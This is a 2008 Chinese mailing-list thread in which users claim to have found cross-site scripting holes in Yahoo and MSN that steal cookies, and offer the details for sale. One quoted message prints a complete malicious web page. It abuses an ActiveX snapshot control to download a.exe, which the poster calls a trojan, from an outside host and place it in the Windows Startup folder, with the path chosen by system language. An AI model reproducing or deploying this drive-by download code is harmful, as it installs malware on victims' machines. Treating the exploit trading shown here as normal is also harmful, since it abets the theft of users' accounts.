那我也卖了 关键细节 要买的联系我。我门单独谈。

2008/10/23 linkboy <[EMAIL PROTECTED]>

> 恩 是有 。20日 已经有人在 www.hackertask.com 叫卖了。
> --- "[EMAIL PROTECTED]" <[EMAIL PROTECTED]>写道:
>
> > 2008-10-23
> >
> >
> > 今天   好像yahoo跟MSN的跨站漏洞有被我挖掘到了
> >
> >
> > 透露下一点点的小信息 跟上次的2次的 一样
> > 关键部分还是有点小变化的
> > 利用的document.cookie);关键语句达到跳
> >
> >
> > 转目的 地址:http://www.coloreagle.com/hotmail/
> >
> >
> > http://www.coloreagle.com/yahoo/
> >
> >
> > 我还无意中抓到了一个网马
> >
> > http://www.coloreagle.com/yahoo/ddd.html
> >
> >
> >
> > 代码如下:<html>
> > <object
> > classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9'
> > id='obj'></object>
> >
> >
> >
> > <script language='JavaScript'>
> >       var buf1 = 'http://www.coloreagle.com/yahoo/a.exe';
> >       var buf2;
> >       var sysLanguage;
> >       sysLanguage=navigator.systemLanguage?
> > navigator.systemLanguage:navigator.language;
> >       if(sysLanguage == 'en-us' || sysLanguage ==
> > 'en-us'){
> >               buf2="C:/Documents and Settings/All Users/Start
> > Menu/Programs/
> > Startup/setup.exe";
> >       }
> >       if(sysLanguage == 'zh-cn' || sysLanguage ==
> > 'zh-CN'){
> >                buf2 = "C:/Documents and Settings/All
> > Users/「开始」菜单/程序/启动/
> > setup.exe";
> >
> >       }
> >       obj.SnapshotPath = buf1;
> >       obj.CompressedPath = buf2;
> >       obj.PrintSnapshot();
> >
> > </script>
> > </html>
> >
> >
> >
> > 区分中英文版本 A。EXE是个木马 呵呵,
> >
> >
> >
> >  具体的细节我就不透露过多了
> > 毕竟一些大牛牛还是要靠这些来吃饭的
> >
> >
> >
> >
> > [EMAIL PROTECTED]
> > 本人联系方式。有任何意见可以跟我交流
> >
> >
> >
>
>
>
>      ___________________________________________________________
>  雅虎邮箱,您的终生邮箱!
> http://cn.mail.yahoo.com/
>
> >
>

--~--~---------~--~----~------------~-------~--~----~
 要向邮件组发送邮件,请发到 [email protected]
 要退订此邮件,请发邮件至 [EMAIL PROTECTED]
-~----------~----~----~----~------~----~------~--~---

回复